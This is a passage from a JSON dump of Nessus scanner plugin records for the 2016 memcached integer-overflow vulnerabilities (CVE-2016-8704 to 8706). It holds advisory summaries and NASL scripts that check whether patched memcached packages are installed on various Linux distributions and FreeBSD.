(20161123)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - Two integer overflow flaws, leading to heap-based buffer\n overflows, were found in the memcached binary protocol.\n An attacker could create a specially crafted message\n that would cause the memcached server to crash or,\n potentially, execute arbitrary code. 
(CVE-2016-8704,\n CVE-2016-8705)\n\n - An integer overflow flaw, leading to a heap-based buffer\n overflow, was found in memcached's parsing of SASL\n authentication messages. An attacker could create a\n specially crafted message that would cause the memcached\n server to crash or, potentially, execute arbitrary code.\n (CVE-2016-8706)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1612&L=scientific-linux-errata&F=&S=&P=14560\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cfa8ff8b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected memcached, memcached-debuginfo and / or\nmemcached-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:memcached\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:memcached-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:memcached-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"memcached-1.4.15-10.el7_3.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"memcached-debuginfo-1.4.15-10.el7_3.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"memcached-devel-1.4.15-10.el7_3.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"memcached / memcached-debuginfo / memcached-devel\");\n}\n", "cvss": {"score": 7.5, 
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T10:59:44", "description": "Cisco Talos reports :\n\nMultiple integer overflow vulnerabilities exist within Memcached that\ncould be exploited to achieve remote code execution on the targeted\nsystem. These vulnerabilities manifest in various Memcached functions\nthat are used in inserting, appending, prepending, or modifying\nkey-value data pairs. Systems which also have Memcached compiled with\nsupport for SASL authentication are also vulnerable to a third flaw\ndue to how Memcached handles SASL authentication commands.\n\nAn attacker could exploit these vulnerabilities by sending a\nspecifically crafted Memcached command to the targeted server.\nAdditionally, these vulnerabilities could also be exploited to leak\nsensitive process information which an attacker could use to bypass\ncommon exploitation mitigations, such as ASLR, and can be triggered\nmultiple times. This enables reliable exploitation which makes these\nvulnerabilities severe.", "edition": 28, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-02T00:00:00", "title": "FreeBSD : memcached -- multiple vulnerabilities (f4bf713f-6ac7-4b76-8980-47bf90c5419f)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2016-11-02T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:memcached"], "id": "FREEBSD_PKG_F4BF713F6AC74B76898047BF90C5419F.NASL", "href": "https://www.tenable.com/plugins/nessus/94459", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are 
permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94459);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n\n script_name(english:\"FreeBSD : memcached -- multiple vulnerabilities (f4bf713f-6ac7-4b76-8980-47bf90c5419f)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n 
script_set_attribute(\n attribute:\"description\", \n value:\n\"Cisco Talos reports :\n\nMultiple integer overflow vulnerabilities exist within Memcached that\ncould be exploited to achieve remote code execution on the targeted\nsystem. These vulnerabilities manifest in various Memcached functions\nthat are used in inserting, appending, prepending, or modifying\nkey-value data pairs. Systems which also have Memcached compiled with\nsupport for SASL authentication are also vulnerable to a third flaw\ndue to how Memcached handles SASL authentication commands.\n\nAn attacker could exploit these vulnerabilities by sending a\nspecifically crafted Memcached command to the targeted server.\nAdditionally, these vulnerabilities could also be exploited to leak\nsensitive process information which an attacker could use to bypass\ncommon exploitation mitigations, such as ASLR, and can be triggered\nmultiple times. This enables reliable exploitation which makes these\nvulnerabilities severe.\"\n );\n # http://blog.talosintel.com/2016/10/memcached-vulnerabilities.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dc2e8021\"\n );\n # https://vuxml.freebsd.org/freebsd/f4bf713f-6ac7-4b76-8980-47bf90c5419f.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d9667a35\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:memcached\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/02\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"memcached<1.4.33\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:14:14", "description": "Security fix for CVE-2016-8704, CVE-2016-8705, CVE-2016-8706\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-15T00:00:00", "title": "Fedora 23 : memcached (2016-4df986a71f)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2016-11-15T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:memcached", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-4DF986A71F.NASL", "href": 
"https://www.tenable.com/plugins/nessus/94804", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-4df986a71f.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94804);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_xref(name:\"FEDORA\", value:\"2016-4df986a71f\");\n\n script_name(english:\"Fedora 23 : memcached (2016-4df986a71f)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-8704, CVE-2016-8705, CVE-2016-8706\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-4df986a71f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected memcached package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:memcached\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"memcached-1.4.17-5.fc23\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"memcached\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T09:49:50", "description": "Aleksandar Nikolic of Cisco Talos discovered several integer overflow\nvulnerabilities in memcached, a high-performance memory object caching\nsystem. A remote attacker can take advantage of these flaws to cause a\ndenial of service (daemon crash), or potentially to execute arbitrary\ncode.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-04T00:00:00", "title": "Debian DSA-3704-1 : memcached - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2016-11-04T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:memcached"], "id": "DEBIAN_DSA-3704.NASL", "href": "https://www.tenable.com/plugins/nessus/94521", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3704. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94521);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_xref(name:\"DSA\", value:\"3704\");\n\n script_name(english:\"Debian DSA-3704-1 : memcached - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Aleksandar Nikolic of Cisco Talos discovered several integer overflow\nvulnerabilities in memcached, a high-performance memory object caching\nsystem. A remote attacker can take advantage of these flaws to cause a\ndenial of service (daemon crash), or potentially to execute arbitrary\ncode.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=842811\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=842812\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=842814\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/memcached\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3704\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the memcached packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 1.4.21-1.1+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:memcached\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"memcached\", reference:\"1.4.21-1.1+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T12:50:54", "description": "From Red Hat Security Advisory 2016:2819 :\n\nAn update for memcached is now available for Red Hat Enterprise Linux\n7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nmemcached is a high-performance, distributed memory object caching\nsystem, generic in nature, but intended for use in speeding up dynamic\nweb applications by alleviating database load.\n\nSecurity Fix(es) :\n\n* Two integer overflow flaws, leading to heap-based buffer overflows,\nwere found in the memcached binary protocol. An attacker could create\na specially crafted message that would cause the memcached server to\ncrash or, potentially, execute arbitrary code. (CVE-2016-8704,\nCVE-2016-8705)\n\n* An integer overflow flaw, leading to a heap-based buffer overflow,\nwas found in memcached's parsing of SASL authentication messages. An\nattacker could create a specially crafted message that would cause the\nmemcached server to crash or, potentially, execute arbitrary code.\n(CVE-2016-8706)", "edition": 29, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-23T00:00:00", "title": "Oracle Linux 7 : memcached (ELSA-2016-2819)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2016-11-23T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:memcached", "p-cpe:/a:oracle:linux:memcached-devel", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2016-2819.NASL", "href": "https://www.tenable.com/plugins/nessus/95276", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2016:2819 and \n# Oracle Linux Security Advisory ELSA-2016-2819 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95276);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_xref(name:\"RHSA\", value:\"2016:2819\");\n\n script_name(english:\"Oracle Linux 7 : memcached (ELSA-2016-2819)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2016:2819 :\n\nAn update for memcached is now available for Red Hat Enterprise Linux\n7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nmemcached is a high-performance, distributed memory object caching\nsystem, generic in nature, but intended for use in speeding up dynamic\nweb applications by alleviating database load.\n\nSecurity Fix(es) :\n\n* Two integer overflow flaws, leading to heap-based buffer overflows,\nwere found in the memcached binary protocol. An attacker could create\na specially crafted message that would cause the memcached server to\ncrash or, potentially, execute arbitrary code. (CVE-2016-8704,\nCVE-2016-8705)\n\n* An integer overflow flaw, leading to a heap-based buffer overflow,\nwas found in memcached's parsing of SASL authentication messages. 
An\nattacker could create a specially crafted message that would cause the\nmemcached server to crash or, potentially, execute arbitrary code.\n(CVE-2016-8706)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-November/006535.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected memcached packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:memcached\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:memcached-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"memcached-1.4.15-10.el7_3.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"memcached-devel-1.4.15-10.el7_3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"memcached / memcached-devel\");\n}\n", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:13:59", "description": "Update to the latest upstream release, which fixes CVE-2016-8704,\nCVE-2016-8705, CVE-2016-8706.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-08T00:00:00", "title": "Fedora 25 : memcached (2016-0c4e822340)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2016-12-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:memcached", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2016-0C4E822340.NASL", "href": "https://www.tenable.com/plugins/nessus/95611", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 